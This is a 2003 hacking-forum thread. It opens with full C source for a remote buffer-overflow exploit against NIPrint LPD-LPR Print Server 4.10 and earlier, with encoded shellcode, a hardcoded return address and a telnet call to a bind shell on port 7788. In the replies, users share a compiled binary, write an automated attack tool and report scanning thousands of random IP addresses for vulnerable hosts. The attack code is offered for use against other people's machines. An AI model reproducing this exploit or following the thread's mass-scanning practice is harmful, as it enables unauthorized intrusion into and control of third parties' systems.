Niprint Lpd-lpr Print Server <= 4.10 Remote Exp.

woutiir

Nov 4 2003, 09:28 PM

Hey ppl, i thought it was time to post something again (been a long time i know) been busy with all kind of things
I hope you enjoy this one, i saw there was a perl version of it.
Tho , C simply rules

Here ya go:

CODE

/*
\ remote exploit for NIPrint LPD-LPR Print Server (Version <= 4.10)
/
\ by xCrZx /BLack Sand Project/ /04.11.03/
/
\ bug found by KF
/ successfully tested on Win XP 5.1.2600
/ P.S.#1 coded just for fun...
\ P.S.#2 this exploit can be compiled under Win32 and *nix
*/

#ifdef _WIN32

#include <winsock.h>
#include <windows.h>

#else

#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

#endif

#include <stdio.h>

// JMP ESP ADDRESS (in Win XP 5.1.2600)
#define RET 0x77F5801c
#define SHELL 7788

char shellcode[] =

"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
"\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
"\x68\x68\x68\x68";

long getip(char *hostname) {
struct hostent *he;
long ipaddr;

if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}

int main(int argc, char **argv) {

#ifdef _WIN32
WSADATA wsaData;
#endif

int sock;
struct sockaddr_in sockstruct;
char tmp[2000];

if(!argv[1]) { printf("Usage: %s <address>\n",argv[0]);exit(0); }

#ifdef _WIN32

if(WSAStartup(0x101,&wsaData)){
printf("Unable to initialize WinSock lib.\n");
exit(0);
}

#endif

memset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(argv[1]);
sockstruct.sin_port=htons(515);

if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

printf("[+] Connected to %s:515!\n",argv[1]);

memset(tmp,0x00,sizeof tmp);
memset(tmp,0x41,49);
*(long *)&tmp[strlen(tmp)]=RET;
memset(tmp+strlen(tmp),0x90,50);
memcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));
send(sock,tmp,strlen(tmp),0);
printf("[+] Exploit code was sent!\n");
}

#ifdef _WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif

printf("[+] Connecting to %s:%d\n",argv[1],SHELL);
sprintf(tmp,"telnet %s %d\n",argv[1],SHELL);
system(tmp);
printf("[-] Not connected! NIPrint probably not vulnerable!\n");

return 0;
}

/* woutiir 0wnZ YoU */

Enjoy it!
Greetings, woutiir

T3cHn0b0y

Nov 4 2003, 10:19 PM

Where can I download the patch for this vulnerability and could post the executable for us to test our systems? I know nothing about C

Anddos

Nov 5 2003, 12:00 AM

wheres the compiled version ?

JDog45

Nov 4 2003, 11:52 PM

#define SHELL 7788 < would be the port to scan for?

agathos

Nov 5 2003, 12:13 AM

yo compiled version is here :>

niprint compiled version

EDIT:

You need to have MS .NET Framework installed to start the programm

MS .NET Framework

JdEeZy

Nov 5 2003, 12:14 AM

Scan port 515... so far I've had no luck with any...

Anddos

Nov 5 2003, 12:38 AM

has that file been scaned for trojans?

agathos

Nov 5 2003, 12:52 AM

i´m not a noob that hides any trojans !!
i have checked and compiled it myself

Anddos

Nov 5 2003, 01:17 AM

do u need any other files to run it
it wont load for me

agathos

Nov 5 2003, 01:39 AM

nope i have only installed MSVC

Anddos

Nov 5 2003, 01:50 AM

so when u go to cmd and try to open it
do u not get any erorrs ?

ssj4conejo

Nov 5 2003, 06:31 AM

Compiles fine in linux, and i've scanned for some but so far, had no luck in gettin a shell, btu there are many with port 515 open... just seem not to be the version or maybe the exploit is broken.

yuliang11

Nov 5 2003, 07:44 AM

thanks man

GhostCow

Nov 5 2003, 11:35 AM

any chance there's a scanner out there?
woutir you got any more info about it? is it private?

T3cHn0b0y

Nov 5 2003, 04:08 PM

ok...thanx for compiling. What are the parameters to run this exploit? Username? Password? OS Type?

chrispen

Nov 5 2003, 04:38 PM

[+] Connected to xxxxxxxx:515!
[+] Exploit code was sent!
[+] Connecting to xxxxxxxxxx:7788
Connecting To xxxxxxx...Could not open connection to the host, on port 77
88: Connect failed
[-] Not connected! NIPrint probably not vulnerable!

i get this all the time , do we need to scan 7788 instead of 515 ?

B3T4

Nov 5 2003, 06:00 PM

QUOTE (chrispen @ Nov 5 2003, 04:38 PM)

[+] Connected to xxxxxxxx:515!
[+] Exploit code was sent!
[+] Connecting to xxxxxxxxxx:7788
Connecting To xxxxxxx...Could not open connection to the host, on port 77
88: Connect failed
[-] Not connected! NIPrint probably not vulnerable!

i get this all the time , do we need to scan 7788 instead of 515 ?

[+] Connected to xxxxxxxx:515!

now what do u think this those ? .... so were do u scan for ?? exactly

Basti

Nov 5 2003, 06:09 PM

OMG dumbass alert

Anddos

Nov 5 2003, 10:41 PM

so every port with 515 is this software?

manni

Nov 5 2003, 11:17 PM

i guess 515 is the default printer server port and you must be very lucky to get an niprint server

JdEeZy

Nov 5 2003, 11:21 PM

Port 7788 is what u [try to] connect to after u've attempted to exploit the box.

Anddos

Nov 5 2003, 11:25 PM

so its port 7788 i scan for now?

Photon

Nov 5 2003, 11:29 PM

LOL no scan for 515 but I tried over 2000 but noone.. so we need a good scanner for this..

r00tless

Nov 5 2003, 11:33 PM

Thanks Man!

neb

Nov 6 2003, 12:42 AM

Can i change this line :

#define SHELL 7788

to define my port for shell ???

manni

Nov 6 2003, 12:18 PM

lol dont think so

hcoca

Nov 6 2003, 03:02 PM

QUOTE (Photon @ Nov 5 2003, 11:29 PM)

LOL no scan for 515 but I tried over 2000 but noone.. so we need a good scanner for this..

like me :Confused:

agathos

Nov 6 2003, 04:49 PM

neb:
Yes you change the port its binds then a shell on this port that you typed

All:

Scan Only for port 515 its the NiPrint Daemon!!
Dont scan the shell port otherwise you found nothing

isaiah

Nov 7 2003, 03:10 PM

can one of you atactch the expliot please

0wn4g3

Nov 7 2003, 05:13 PM

nice exploit but i don`t find a vuln server at 515

johannes30

Nov 7 2003, 05:44 PM

have anyone a vuln checker for port 515?

isaiah

Nov 8 2003, 10:29 PM

As Some have Said Before...

Port 515 is the Universal Port for Print Servers/Daemons. So if you count the number of Print Servers out there (TONS). The likelyhood of getting a Vuln Server running NiPrint, is very small..

The exploit isnt broken..

Xxplozive

Nov 30 2003, 03:31 AM

i search a vulnerable checker scanner. have someone a scanner for this?

DownBload

Dec 2 2003, 12:16 PM

LOL...
Shouldn't that system(tmp) be at least a little bit strange???
This is fake exploit - trojan maybe - try to "decrypt" shellcode and see what he does.

agathos

Dec 2 2003, 12:59 PM

so if you read correct

sprintf(tmp,"telnet ......."\n);
system(tmp);

that means:

he saves the string "telnet ......" into the char tmp!
and runs then over system procedure

biboupoki

Dec 2 2003, 01:20 PM

thanx i m gonna to try it

DownBload

Dec 3 2003, 12:38 PM

QUOTE (agathos @ Dec 2 2003, 12:59 PM)

so if you read correct

sprintf(tmp,"telnet ......."\n);
system(tmp);

that means:

he saves the string "telnet ......" into the char tmp!
and runs then over system procedure

Yes, my fault :-)

ivan288

Dec 3 2003, 01:05 PM

nice exploit but verry hard to find vuln. servers. if anyone has a tool for this please share with us.

Xion

Dec 4 2003, 09:06 PM

it's veru nice exploit I test now

Xxplozive

Dec 10 2003, 01:15 AM

I've written a niprint autohaxxor but i didn't found a vulnerable niprint!

trunks

Dec 10 2003, 03:30 AM

i scanned over 400 ips.. no luck yet

Xion

Dec 10 2003, 08:24 PM

thx for nice exploit

Knutinho

Feb 3 2004, 11:54 PM

Thx for the nice Exploit !!

Anybody able to Link the compiled version onlien again ??

Thx a lot !!

DerangeD

Feb 4 2004, 07:03 AM

compiled it but didn't get any results with this sploit

scanned over 500 ip's

anyone had luck using this ?

Feuerstein

Feb 4 2004, 02:17 PM

i added an option for hostlistfiles, but never ever had a shell. anyone ever got 1 ?

// also codet banner scanner for this purpose. see results below:

CODE

*.*.*.*: [/usr/sbin/lpd: zappa: Malformed from address
]
*.*.*.*: [/usr/sbin/lpd: zappa: Malformed from address
]
*.*.*.*: [/usr/sbin/lpd: zappa: Malformed from address
]
*.*.*.*: [/usr/sbin/lpd: zappa: Malformed from address
]
*.*.*.*: [/usr/sbin/lpd: zappa: Malformed from address

which look like *nix servers, and furthermore

CODE

*.*.*.*: [lpd: master : Malformed from address
]
*.*.*.*: [lpd: master : Malformed from address
]
*.*.*.*: [lpd: master : Malformed from address
]

which might be nt, but with enabled hostmask

already scanned bout 20000 ips, but no exploitation yet